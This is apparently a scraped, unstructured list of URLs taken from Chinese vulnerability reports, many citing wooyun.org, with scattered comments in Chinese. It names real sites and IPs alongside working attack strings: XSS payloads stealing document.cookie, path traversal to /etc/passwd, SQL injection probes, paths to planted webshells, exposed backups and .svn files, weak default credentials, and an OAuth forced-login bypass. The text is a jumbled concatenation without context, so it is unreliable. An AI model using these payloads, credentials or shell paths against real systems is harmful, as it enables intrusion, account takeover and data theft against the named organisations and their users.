http://data.games.sina.com.cn/zqShowInfo.php?aid=162907 http://data.games.sina.com.cn/zqInfoAdd.php?game_id=136&category_id=2856 
http://service.cheshi.com/complain/complain.php http://58.252.5.165/pople.asp URL:http://yao.xywy.com/index.php?a=newajaxgetdrugshop&drugid=39842-2%2b4-2-2%2b99&pinyin=sjs gzgl.etec.edu.cn/uids/login!login.action http://www.517huwai.com/Photo/doUploadEditorAttach http://file.517huwai.com/Public/Uploads/2013/08/04/51fdfa0c30a6c.php http://www.998.com/Reservations/Hotel_Detail.aspx?HotelCode=121224 http://www.998.com/ScriptResource.axd?d=xxoo http://wooyun.org/bugs/wooyun-2010-025911 http://www.gsjtzb.com/gsjtzb.rar http://61.187.56.156:9090/ http://hmms.haier.net/security/login.action http://service.haier.net:8080/bbs/upload/member.php?action=list&srchmem=&order=regdate&type=&page=1 http://10.128.3.67:8080/css/logined.jsp?forward=http%3A%2F%2Fservice.haier.net%3A8080%2Fbbs%2Fupload%2Fmember.php%3Faction%3Dlist%26srchmem%3D%26order%3Dregdate%26type%3D%26page%3D100 http://itpx.haier.com/bbs/search.asp?action=re&t=261&s=dvbbs https://bcc.haier.com/Module/Admin/frm_fyysjl.aspx http://203.208.46.148/#bav=on.2,or.&ei=8un9UeHhH4XwkAWhu4HwCw&fp=34d30f151318e80d&newwindow=1&q=site:bcc.haier.com&sa=N&start=0 https://bcc.haier.com/BCCZB201104.xls https://bcc.haier.com/BCCZB201101.xls https://bcc.haier.com/BCCAMP/Module/GGF/QTLC/Frm_Image_File.aspx?table=t_GGF_Directive_Sub_FJ2&cbillcode=GG10102810158756&iid=1 http://file.517huwai.com/Public/Thumb/?w=225&h=1000&t=f&url=./Public/Uploads/2013/08/04/51fde94d30faa.jpg http://file.517huwai.com//Public/Uploads/2013/08/04/51fde94d30faa.jpg我们整理成这样。 http://www.casarte.cn/plugin.php?action=show&fid=6450&id=casarte_vote:index http://www.casarte.cn/ksd/list.php?city=大连 http://www.casarte.cn/pcenter/robots.txt http://global.midea.com.cn/midea/download.jsp?url=../../../../../../etc/issue http://global.midea.com.cn/midea/news/news-list.action http://news.wehefei.com/htmlphp/guest/show.php?id=16 http://xyxxgk.hnsl.gov.cn/LoadPublicViewEmployeesList.action http://www.baidu.com chrome://resources 
chrome-extension://mndnfokpggljbaajbnioimlmbfngpief http://www.j1.com/show-forgetPassword.html http://61.172.201.211/ http://dict.baidu.com/wordlist.php http://xsserme http://218.58.70.220/ http://218.58.70.220/sl.asp;.txt http://218.58.70.220/wooyun.txt http://218.58.70.220/WJ_MarketNew/ http://218.58.70.220/WJ_Market/ http://218.58.70.220/WasterDayWork/ http://218.58.70.220/SupplyAudit/ http://218.58.70.220/wj_zndz/ http://218.58.70.220/Protype/ http://www.cztv.com/kaoshi/ http://www.cztv.com/kaoshi/plus/mytag_js.php?aid=9090 http://buy.eshare.189.cn/youhui.php?ctl=store&act=view&id=28 http://222.247.54.151/ http://119.10.114.213/html/Login.aspx http://mobile.ganji.com/?ajax=true&ajax_act=send_phone&url=短信内容&phone=手机号 http://t.jd.com/product/followProduct.action?productId=934543&t=0.0032420307736847898 https://idss.haier.net http://user.sanwen8.cn/admin/edit?aid=1320441 http://219.232.246.221 http://drops.wooyun.org/tips/68 http://www.lyjyw.gov.cn http://96093.fm93.cn/dede/index.php http://rsj.zjjcl.gov.cn/admin/ http://rsj.zjjcl.gov.cn/admin/Databackup/3.php http://tieba.56.com/v?tn=6381708 http://tieba.56.com:81/后台你懂的/test.php http://musicbox.56.com http://musicbox.56.com/player.html?mid=5757764&userid=gankfuck http://ztv.divast.com/jmx-console http://www.a6gps.com http://www.jjghj.gov.cn/jjghj/info.php?infos_id=731 http://www.jjghj.gov.cn/jjghj/info.php?infos_id=731000000 http://www.jdxf.gov.cn/download.php http://www.jdxf.gov.cn/down.php?dd=文件名 http://www.jdxf.gov.cn/down.php?dd=../down.php http://biz.finance.sina.com.cn/search/product/detail_futures.php?id=1 http://biz.finance.sina.com.cn/search/product/detail_futures.php?id=1 http://218.58.70.220/ http://user.sanwen8.cn/会员中心COOKIE验证问题 http://www.yindarunhe.com/initService.action http://www.t3pay.cn/gameAction!toGamePay.action http://www.xmobo.com/website/downloadDian.action http://www.paymei.net/unionEposAction!toEposPaymentByYeQuery.action cn:8004 
http://dev.10086.cn/(移动开发者论坛)这个站论坛里面的shmily1023121用户,超级管理员哦,到最后没社工成功,反倒发现了sql注入,首先说下社工shmily1023121管理员的失败过程吧,但是也值得注意,安全意识有提升的空间 http://www.boohee.com/ http://dev.10086.cn/cmdn/supesite/newdev.joyesdetail.php?recommendId=24 http://events.youku.com/acer/.svn/entries http://minisite.youku.com/newproduct/event/apple912/getfile.php?file=apple0912_windows.ics http://vq.youku.com/resin-admin/digest.php http://v.youku.com/v_show/id_XNTg2ODg3ODcy.html?f=19400289&o=%3C/script%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E;// http://v.youku.com/v_show/id_XNTg2ODg4MzMy.html?f=19400289&o=0 http://v.youku.com/v_show/id_XNTg2ODg3ODcy.html?f=19400289&o=0 http://v.youku.com/v_show/id_XNTg2ODg3OTM2.html?f=19400289&o=0 http://v.youku.com/v_show/id_XNTg2ODg4MjQ0.html?f=19400289&o=0 http://v.youku.com/v_show/id_XNTkwNTcwNjA4.html?f=19400287&o=0 http://v.youku.com/v_show/id_XNTg2ODg2Njg4.html?f=19400289&o=0 http://v.youku.com/v_show/id_XNTkwNTcwOTEy.html?f=19400287&o=0 http://v.youku.com/v_show/id_XNTg3NTc5NjE2.html?f=19400287&o=0 http://v.youku.com/v_show/id_XNTg3NTc5Njk2.html?f=19400287&o=0 http://v.youku.com/v_show/id_XNTg0NTU3NDA4.html?f=19400284&o=0 http://i.youku.com/u/UNDE2NTYzMzky/videos/?q=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://i.youku.com/u/UMTA5NTc5NzY http://i.youku.com/u/UMTMwMzg5Mg http://i.youku.com/u/UMzM3NDM5MzM2 http://i.youku.com/u/UMjc5MzI5NDA http://i.youku.com/u/UNDA5NDkzOTEy/ http://i.youku.com/u/UMzg1OTc3MDU2 http://i.youku.com/u/UMTM2NzgyNzE2/ http://i.youku.com/u/UMTcyNzk3ODM2/ http://i.youku.com/u/UNTY5MDQ5Njcy/ http://i.youku.com/u/UMzUxNzk5Njg0/ http://i.youku.com/u/share/?url=This%20is%20a%20test%22%3E%3C/textarea%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://oreo.youku.com/api/pop_video.php?vid=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://comments.youku.com/comments/comments?id=73500&bind_type=1&pl=5&width=0&height=0&minisite=0&color=1&backurl=%3C/script%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E;// 
http://minisite2.youku.com/activities_fee/www/integral/continue_sign_in.php?callback=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://i.youku.com/u/search?q=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://www.youku.com/playlist_show/id_19485175.html?page=1&mode=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&ascending=1 http://v.youku.com/v_map?lng=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&lat=41.8087005615 http://www.jukuu.com/portal/video.php?id=12800 http://www.aouu.com/ddpim/pim.action http://blog.home.blogbus.com/settings/basic。 http://www.haibi.com/sdo/planeB2c.do http://s.baixing.net/page/combine.php?files=/../index.php http://117.79.[马赛克]:8080/ http://www.jxgh.gov.cn/jg/display.php?newsId=356 http://www.jxgh.gov.cn/jg/display.php?newsId=356 http://g.19e.cn/index.do http://61.183.175.27 www.jxf.gov.cn/WebContent.rar www.jxf.gov.cn/T_INTERACT.dmp www.jxf.gov.cn/t_info.dmp www.jxf.gov.cn/t_info1.dmp http://www.clubwanda.com.cn http://www.tcwenchang.gov.cn/pro_display.php?id=67 http://www.apppark.cn存在structs2漏洞,现在洞洞还没补上 http://www.apppark.cn/software_recommand_other.action http://www.qhfda.gov.cn http://www.whzj.gov.cn/quality.php?fid=4 http://www.xingbin.gov.cn/info/type/?type_id=52 http://www.jsxinyi.hrss.gov.cn/hdist.do?channelid=55 http://www.jsxinyi.hrss.gov.cn/zxhf.do?id=484 http://www.jsxz.lss.gov.cn/cxpage.do?channelid=8 http://www.nckj.gov.cn/?mod=document&tpl=content&channelid=2&cateid=12&documentid=252 http://211.152.60.227:8011/API/getresv.aspx?service=get_resv_info&partner=ben4a8ysd&orderid=130512021002006 http://59.252.212.6:8080/powercms/web/Play.action http://www.flyhigh.com.cn http://service.dcloud.cn/register/articleinfo/webtoHelpArticleInfo.action http://www.189mv.cn/moviebook/reloadMovieGrade.action http://zt.baicai.com/201102/answer/61.html http://www.zhongtaitrust.com/cn/career/join_content.jsp?id=69 http://www.zhongtaitrust.com/cn/fortune/products/fortune_content.jsp?id=-1&type= 
http://www.zhongtaitrust.com/cn/fortune/products/info.jsp?infoid=407&type=info http://www.zhongtaitrust.com/cn/fortune/service/falv.jsp?lawid=19&type=laws http://www.zhongtaitrust.com/cn/news/news_content.jsp?id=1637&type=solution http://search.17k.com/query.do http://manager.17k.com/login.action jdbc:mysql://db.17k.com:3306/chi*****ll?useUnicode=true&characterEncoding=utf8&autoReconnect=true http://www.wefinder.com/ http://www.fengbuy.com/ http://t.cang.com/10850 http://www.cang.com/blog/ http://winning.buywit.cn/createLicense/check.php?key= http://winning.buywit.cn/createLicense/getlicense.php?key= http://product.news.sohu.com/news/tbag/ http://www.ichaier.com/downfa.php?thiks=YWFEOlx3d3dcaW5jbHVkZVxjYXQuZnVuYy5waHBiYg== http://www.ichaier.com/downfa.php?thiks=YWFpbmRleC5waHBiYg== www.ichaier.com/phpinfo.php http://service.uboxol.com/login/login http://211.151.164.47/seeyon/index.jsp http://211.151.164.78/index.php http://211.151.164.62/ http://neirong.uboxol.com/index.php http://vms.uboxol.com/ubox-vms/login.do http://124.127.89.53:8080/zentao/ http://124.127.89.57/ https://124.127.89.49/ http://124.127.89.51:8080/ http://124.127.89.53:8080/zentao/data/upload/1/ http://124.127.89.57/ http://124.127.89.57/Login.ashx?&Type=Login http://124.127.89.57/Login.ashx?Type=Load http://localhost/zz.php?a=xxx http://202.102.238.36:7002/FPApp/index.jsp http://202.102.238.36:7002/FPApp/wbxx/news/list.jsp?id=1 http://autoclaim.cpic.com.cn:8001/notice.jsp?noticetype=OUTERNOTICE http://218.246.99.199/Report.action http://guide.ecos.shopex.cn/step2.php?refer=eyJjZXJ0aV9pZCI6MTA1MSwiY2FsbGJhY2tfdXJsIjoiaHR0cDpcL1wvd3d3LmVrYWlkaWFuLmNvbVwvIn0= www.joyogame.net\/ http://oms.ahtycp.cn/login.do http://www.yunduan.cn/www.yunduan.zip http://pan.baidu.com/share/link?shareid=3205655301&uk=4164057933 http://open.hichina.com/open.zip http://pan.baidu.com/share/link?shareid=3729559197&uk=4164057933 http://www.pi-china.org/ http://www.pi-china.org/database/ 
http://www.jilixingdong.org/inputLogin.action?redirect:http://www.baidu.com http://www.gslib.com.cn/ http://www.gslib.com.cn/Gslibadmin/Admin_Commnet.asp http://www.kfcyouhui.com/web.rar http://www.pizzahutparty.com/web.rar http://www.dfjb.com.cn/web.rar http://youhui.dfjb.com.cn/web.rar http://youhui.yum.com.cn/ http://111.4.115.144/spjg/login.action http://tao.weiphone.com http://www.fumu.com/api/js.php?tagname=%5B2012%5D%CE%C4%D5%C2%C5%C5%D0%D0&catid=11087 http://j.esf.sina.com.cn/login/retrievepsd http://xz.ahnw.gov.cn/ http://www.cecn.gov.cn/ http://www.aqfdc.gov.cn/ http://www.rcghj.gov.cn/ http://www.hnfo.gov.cn/ http://www.hbrf.gov.cn/ http://www.liketuan.com/mycenter/myAddress.html?action=edit&id=199840 http://www.lbex.com.cn/ http://oa.lbex.com.cn/oa.rar http://www.epay360.cn http://www.epay360.cn/common/clientLogin!join.action http://beijing.pztuan.com/order/update_address.aspx?id=271180 http://data.auto.tom.com http://data.auto.tom.com/admin/brand.jsp?id=23 http://data.auto.tom.com/admin/searchForm.jsp http://data.auto.tom.com/admin/reference.jsp?id=3 http://data.auto.tom.com/admin/main.jsp?id=113 www.blzyz.org http://www.dyp2p.com/data/cache/help34.php http://sg.dzwww.com/ http://oa.gzgwbn.com.cn:8080/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://www.hnjgdj.gov.cn/shizheng.asp?kind=%CA%B1%D5%FE%D0%C2%CE%C5&id=8220 http://cas.womaiapp.com/sso/login/?ret_url=http://118.144.75.20/user/login.action&app=cms5 http://118.144.75.16/Citrix/XenApp/auth/login.aspx http://recommend.womai.com:1107/proxy/apidocs/index.html?overview-summary.html http://photo.qq.com/cgi-bin/common/cgi_load_flash?uin=2640854696&fid=82332 http://moldsale.haier.com/admin/Default.aspx http://chinafun.com.tw/star_photo.php?artist_id=9 www.henanredcross.org/admin http://218.58.70.209:8080/ http://218.58.70.209:8080 http://admin.178.sdo.com/kindeditor/php/file_manager_json.php?path=./image/20120424/ http://admin.178.sdo.com/clear_msg.php 
http://admin.178.sdo.com/.svn/entries http://admin.178.sdo.com/.svn/text-base/index.php.svn-base http://admin.178.sdo.com/.svn/text-base/clear_msg.php.svn-base http://www.gyebank.com/index.html ftp://aquapower.cn/ http://www.tunka.com.cn/ http://cskb.ithaier.com/ http://cskb.ithaier.com/sysadm/thinkpad/indexpheno.jsp?id=1374284517391&parentCategoryID=1101210294169 http://travel.haier.com/travel http://travel.haier.com/travel/BaseInfo/SupplierSelect.aspx http://travel.haier.com/travel/web.zip http://218.58.70.220/海尔质量信息管理平台 http://218.58.70.220 http://client.100e.com/tool/Book/Courseware/Add/index.aspx?categoryID=2 http://img.100e.com/js/Common/地址 http://client.100e.com/tool/EnterRoom http://sso.easou.com/user/changepass http://www.wooyun.org/corps/%E5%94%AF%E5%93%81%E4%BC%9A http://wooyun.org/bugs/wooyun-2010-025239 http://125.77.198.26:9002/channelaccount/login!toLogin.do http://www.hns93.gov.cn/1.rar http://www.hns93.gov.cn/data.rar http://www.sinosig.com/festival_getBestWishes.action http://chexian.sinosig.com/carPremium/recommendAction_loadStart.action http://wecare.sinosig.com/product_productList.action?tag=1&id=1538&flag=mobile http://ec.sinosig.com/sx_show.action?COLLCC=2010671119& http://vicitim/a.html http://lottery.sports.sohu.com/readme.txt http://lottery.sports.sohu.com/esunmanage/ThinkPHP/Lib/Think/Db/Driver/pgsql.sql http://61.187.64.20:8089/ http://61.187.64.20:8000/ http://61.187.64.20:8089/teacher.asp?id=111 http://bbs.cmge.com/forum.php http://bbs.cmge.com/data/attachment/common/cf/1826109bzxrcj0pl9tgdrz.png/.php http://bbs.cmge.com/data/attachment/forum/201308/08/103904yasjau3gaaa5nnng.jpg/.php http://www.vogue.com.cn http://mall.zj189.cn/index.jsp?u=18905718888 http://3g.zj189.cn/modules/login/getps.jsp?url=http://3g.zj189.cn/torate.jsp?ad=mall http://album.appchina.com/wp-includes/ http://bbs.appchina.com/data/ http://bimg.yingyonghui.com/data/ 
http://plus.appchina.com/app/img?fileId=07ef8e16b6b5f16b0c09b69a52f56f1a6c433076&packageName=air.bftv.larryABCs http://despatchwbep.sf-express.com http://home.ithaier.com/wooyun.aspx http://home.ithaier.com/z7y.aspx http://home.ithaier.com/ http://home.ithaier.com/TechReportDoc.aspx?ReportCode=GFCB090316028 http://www.ahong.com.cn/phpinfo.php http://www.ahong.com.cn/phpmyadmin/ http://www.pigai.org/index.php?c=pga&a=manage&uid=108566 http://www.xj96566.com/IOC/client/login!index.action http://train.cqvip.com/ http://train.cqvip.com/search.asp?iid=123 http://cs.tktang.com/qa/Index.action www.jsqczj.gov.cn http://www.517huwai.com/photos/5199538 http://www.517huwai.com/photos/5199538 http://www.517huwai.com/photos/5199538 http://www.517huwai.com/travels/5199538 http://www.517huwai.com/album/72195 http://www.517huwai.com/Space/activity/uid/5199538 http://www.517huwai.com/blogs/5199538 http://www.517huwai.com/plans/5199538 http://www.517huwai.com/favour/5199538 http://cms2013.beareyes.com.cn/shell.php http://115.182.21.55 http://xcl.1633.com http://rc.sanya.gov.cn/person/view.php?id=655 http://rx.cmge.com/hjqstWwwAction!index http://bwzq.cmge.com/bwzqWwwAction!index http://long.cmge.com/lzsgWwwAction!index http://l.cmge.com/lzzhWwwAction.action http://fytx.cmge.com/fytxWwwAction!index.action http://xmsh.cmge.com/XmshWwwAction!index.action http://wuxia.cmge.com/wuxiaWwwAction!index User:Admin Pass:12345 http://blog.ccidnet.com/admin.php http://60.216.75.44:9081/wansinsup/login.jsp http://60.216.75.44:9081/wansinsup/shell.jsp http://maths.henu.edu.cn/data/mysql_error_trace.inc http://maths.henu.edu.cn/mathadm/login.php http://60.216.75.44:9081/wansinsup/ http://oldweb.cqvip.com/ http://oldweb.cqvip.com/zhuce/changeinfo.asp?UserName=aaa http://sxyk.henu.edu.cn/user/USERJIHUO.ASP?id=1 http://sso.agri.gov.cn/ http://sso.agri.gov.cn/admin/login.jsp http://www.wooyun.org/bugs/wooyun-2013-033288/trace/8c1d5c8c70ca3d62dcf7e4679551a265,如果方便你看可以重新审核下不。 
http://pan.baidu.com/share/link?shareid=3747840041&uk=3122795587 http://download.sf-express.com/tshThSIjBouKg/XbAXCDkfoW.jsp http://kyc2.henu.edu.cn/default.aspx http://learning.haier.com/Saba/Web/Main http://learning.haier.com/jmx-console/ http://60.216.75.46:8787/taopqijian/login http://60.216.75.46:8787/taopqijian/shell.jsp http://gcztb.zhongnangroup.cn:8381/index.do http://java.sun.com/ http://www.scbuilder.com/appmain/Admin/PriUserList.aspx?SysType=3 http://www.scbuilder.com/appmain/Admin/AddUser.aspx http://www.scbuilder.com/appmain/Admin/AppIconList.aspx http://ymhm.mwr.gov.cn/toLoginPage.do http://021web.v5shop.com.cn http://021web.v5shop.com.cn/www.rar http://021web.v5shop.com.cn/weblogin/WebAdmin.aspx http://www.v5shop.com.cn/phpMyAdmin/ http://www.cqvip.com/Common/LoadPageBase.aspx?path=/web.config http://ipub.cqvip.com/Common/LoadPageBase.aspx?path=LoadPageBase.aspx http://service.v5shop.com/statistics.aspx http://service.v5shop.com/system/system.rar http://member.cpic.com.cn/ucf/register/regActiveOk?theme=new&email=邮件地址&msg=activeSuccess http://member.cpic.com.cn/ucf/register/regActiveOk?theme=new&email=smtp_admin@yeah.net&msg=activeSuccess fn:simplePassword fn:showPasswordStrong http://mas.kdlins.com.cn/file/ http://mas.kdlins.com.cn/tmp/ http://mas.kdlins.com.cn/common/viewsmsinfo/failUserList.jsp http://mas.kdlins.com.cn/common/shell/ http://dianping.chexun.com/bj/coupon_search?CommercialID=206 http://61.178.83.50:8001/login.do http://cas.womaiapp.com/sso/login/?ret_url=http://118.144.75.20/user/login.action&app=cms5 http://cas.womaiapp.com/admin/ http://www.fmi.com.cn/index.php/User/addFollow/table/Users/uid/9735 http://www.ahongmall.com/ http://v5.pc.duomi.com/single/single.shtml?id=29869663592644772 http://news.haierpeople.cn/ http://news.haierpeople.cn/cat.aspx?s=1 http://home.soufun.com/jiancai/SearchList.aspx http://www.eboss.cn/eboss_manage/index2.php?p=utf8&c=site_manage&a=insitesearch&keyword=a%27 
http://www.eboss.cn/eboss_manage/index2.php?c=site_manage&a=sinawbTop&wr=103%27 http://www.eboss.cn/eboss_manage/index2.php?c=site_manage http://www.eboss.cn/changyongzixun/TOP10 http://www.3qec.com/login.jsp http://hd.eastmoney.com/vote.aspx http://www.hcxsgz.zjut.edu.cn/ShowNewsPageAction.do http://www.hcxsgz.zjut.edu.cn/shell.jsp http://t.eastmoney.com/search.aspx?kw=a% http://t.eastmoney.com/search.aspx?kw=a% http://corp.eastmoney.com/aboutus/gt_detail.aspx?id=1 http://corp.eastmoney.com/aboutus/gt_detail.aspx?id=1 http://hkba.eastmoney.com/guba_hqpost.aspx?stockcode=01186 http://support.zte.com.cn http://support.zte.com.cn//admin/ http://support.zte.com.cn/ftpdata/ http://voicechina.groups.tianya.cn/tribe/member.jsp?groupId=500974&orderby=score&orderbyDirection=desc&member= http://voicechina.groups.tianya.cn/tribe/pictureLib.jsp?groupId=500974&orderbyColumn=create_time&orderbyDirection=desc&member=&pageNo=1 http://xbjylm.groups.tianya.cn/tribe/pictureLib.jsp?groupId=423887&orderbyColumn=create_time&orderbyDirection=desc&member=&pageNo=1 http://3067.groups.tianya.cn/tribe/pictureLib.jsp?groupId=83067&orderbyColumn=create_time&orderbyDirection=desc&member=&pageNo=1 http://liumangjulebu.groups.tianya.cn/tribe/pictureLib.jsp?groupId=312&orderbyColumn=create_time&orderbyDirection=desc&member=&pageNo=1 http://groups.tianya.cn/tribe/pictureLib.jsp?groupId=142&orderbyColumn=create_time&orderbyDirection=desc&member=&pageNo=1 http://www.haierbid.com/ https://58.56.128.8/tcs https://58.56.128.8/tcs/Frm_HaierCustReg.aspx https://58.56.128.8/tcs/Frm_HaierCustReg.aspx https://58.56.128.8/tcs/Frm_HaierCustReg.aspx http://218.58.70.214/haiergc/海尔大客户项目管理系统 http://etagent.12580.com/NewPortal/loginAction.do http://zone.wooyun.org/content/5091 http://www.haiercrm.com/jxc/index.jsp http://www.haiercrm.com/acceptcatdata/login.jsp http://www.haiercrm.com/ipos/login/login.htm http://www.haiercrm.com/rrs/login.jsp 
http://www.haiercrm.com/jxc/mobileuser/queryfrommfid.jsp?PageIndex=1&search1=&search2=&search3=12C01&name1=SAP_FROMMFID&name2=SAP_FROMMFNAME&mktid= http://www.haiercrm.com/jxc/mobileuser/queryfrommfid.jsp?mktid= http://www.haiercrm.com/jxc/mobileuser/queryfrommfid.jsp?name1=SAP_FROMMFID&name2=SAP_FROMMFNAME&search3=12C01 http://mm.56.com/ http://www.cqda.gov.cn/a.zip http://59.48.152.133:8080帐号admin密码123456.弱口令啊有木有 http://wpfree.yesky.com/plus/mytag_js.php?aid=9090 http://www.3366.com/flash/1000168.shtml http://www.itophome.com/海尔e家联盟 http://marketing.haieruhome.com/海尔终端执行力系统 http://marketing.haieruhome.com/wooyun.txt http://www.itophome.com/uploadfiles/1.aspx http://www.itophome.com/uploadfiles/ht.aspx http://www.itophome.com存在fck编辑器上传漏洞。 http://www.itophome.com/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Flash http://sync.coral.qq.com/t/1000269489?source=1&callback=1014xxx%3Csvg/onload=alert%28document.cookie%29%3E&_=1376185737425 http://211.90.10.114 http://evs.haier.net/easp/uiloader/login.html海尔电子核销系统 http://evs.haier.net/easp/uiloader/$/ssb/uiloader/ssoLoginMgt/login.ssm http://evs.haier.net/easp/uiloader/login.html http://211.90.10.225:8080 http://login.2345.com/find.php?type=password http://219.239.97.42/ http://219.239.97.42/ScriptResource.axd?d=yGw8u5dqy7H3e40ExMqJYFttlP5WFyaiqezeZ9yBfvoAAAAAAAAAAAAAAAAAAAAA0 http://wooyun.org/bugs/wooyun-2013-034101 
http://dyp2p.com/?code&p=add&q=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ http://newadmin.newman.mobi/default.php?m=default&c=service&cat_id=82&atr_id=84 http://www.newman.mobi/default.php?m=default&c=service&cat_id=82 http://libao.game.pps.tv/lbcenter/getgift/index?g_id=352 http://libao.game.pps.tv/lbcenter/getgift/index?g_id=352%3CH2%3Ewahaha%3C/H2%3E http://c.etuan.com/ root:root123 root:654321 root:123456 root:root http://123.234.41.202:8390 http://123.234.41.202:8390/login.action http://123.234.41.202:8390/shell.jsp http://register.ccidnet.com/comment/disp/topic_comment?topicID=46690#comment http://cn.bing.com/search?q=ip%3A123.183.218.107&qs=n&form=QBLH&pq=ip%3A123.183.218.107&sc=0-2&sp=-1&sk= arts.lib.tsinghua.edu.cn/data/mysql_error_trace.inc爆信息 http://www.kdlins.com.cn/poispLogon!findPassword.action?userId= http://202.102.111.101/login_login.action http://subscribe.ellechina.com/ http://subscribe.ellechina.com/w/x.asp http://sae.sina.com.cn/)页面上方的登录按钮时,会转到新浪微博的“应用授权”页面。由于用户登录后可以直接修改SAE平台上应用的重要信息,所以在这里SAE平台使用了强制登录功能,即“应用授权”页面不会自动读取当前用户的登录信息(如果有),而是强制要求用户输入帐号和密码。 https://api.weibo.com/oauth2/authorize?client_id=2857799177&redirect_uri=http%3A%2F%2Fsae.sina.com.cn%2Fssl%2F%3Fm%3Dsso%26a%3Dweibo_callback%26sccb%3Dhttp%253A%252F%252Fsae.sina.com.cn%252F&response_type=code&forcelogin=true,位于最后的“forcelogin=true”就是用来控制“强制登录”功能,删除这个代码再按回车,应用授权就会直接直接读取用户登录信息并通过授权(如果该电脑已经成功的登陆过微博并选择了“下次自动登录”,而很多用户都会勾选) http://www.hlj.stats.gov.cn/1.rar http://www.hnxmy.gov.cn/www.hnxmy.gov.cn.rar http://bjjnds2011.ccidnet.com/fckeditor/ http://bjjnds2011.ccidnet.com/data/ http://bjjnds2011.ccidnet.com/include/ http://bjjnds2011.ccidnet.com/data/servise.php http://bjjnds2011.ccidnet.com/data/1af339d2d06317bb0a797e31d882d025_safe.txt http://passport.soufun.com/othercallback.aspx?sinaid=45410 http://passport.soufun.com/othercallback.aspx?sinaid=45409 http://passport.soufun.com/othercallback.aspx?sinaid=45408 http://www.hnfgw.gov.cn/web.rar 
http://116.228.55.5/114Ad/introduce.aspx http://116.228.55.5/114Ad/articledetail.aspx?id=315 http://w.fjwest.com/wpzj/Main/main.jsp https://mp.weixin.qq.com/cgi-bin/advanced?sub=index&t=advanced/index&token=【这里改成自己的Token】&lang=zh_CN http://xx.oo/tztsms4/index.php http://xx.oo/tztsms4/censor/qtgs_all.php http://xx.oo/tztsms4/censor/qtgs_all.php?page=数字 http://tangyuan.tom.com/admin/user_passport.php www.elline.cn同样存在相同漏洞 http://www.tijian.org/shownews.asp?id=179 http://www.tijian.org/admin/login.asp http://admin.dj.dou.91.com/?do=Login http://www.ddmap.com/ http://wpfree.yesky.com/plus/downpic.php?id=396 http://goldpen.ccidnet.com/goldpen/ http://www.tprtc.com)有几大类模块包括“企业国有产权挂牌项目”、“企业产权挂牌项目”、“涉诉资产交易平台”等版块,点其中一个模块的链接,会跳转至另外一个项目,如我点击编号为1201CSW20130801002 http://xinxipingtai.tprtc.com:8080/transaction/D_table/swjy.jsp?no=1201CSW20130801002,通过分析这是交易平台一个子项目,监听端口为0080,初步怀疑是用Tomcat容器,重新打开一个浏览器,输入http://xinxipingtai.tprtc.com:8080回车,熟悉的界面出现在面前 http://xinxipingtai.tprtc.com回车,出现子项目的界面,点击“产权转让项目信息”,内容如图所示 http://uap.91.com/user?username=admin0242 http://uap.91.com/user?username=admin0242%27%23 http://wooyun.org/bugs/wooyun-2010-06672 www.ycxl.net http://www.***.com/admin/upfile.asp?folder=../upload&insert=wj www.e-chinalife.com http://www.e-chinalife.com http://117.79.80.23:8000/robots.txt http://117.79.80.23:8000/info.php http://www.xinnet.com/xinnetol.war http://nc.womaiapp.com/login.jsp android:name="com.baidu.android.defense.push.PushMsgReceiver android:process=":bdservice_v1 android:name="com.baidu.android.pushservice.action.RECEIVE android:name="com.baidu.android.pushservice.action.MESSAGE http://www.joinwish.com/wish/show/id/12074 http://gd.91.com intitle:topsec www.landks.com www.zjhnztb.com www.haas.org.cn http://www.jstzrcb.com/artshow.action http://www.sndrc.gov.cn/ldxx/fwb5.jsp?LID=321 http://v.baidu.com/v?word=x&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800#%22%3E%3C/script%3E%3Ciframe/onload=alert%281%29%3E&qq-pf-to=pcqq.c2c 
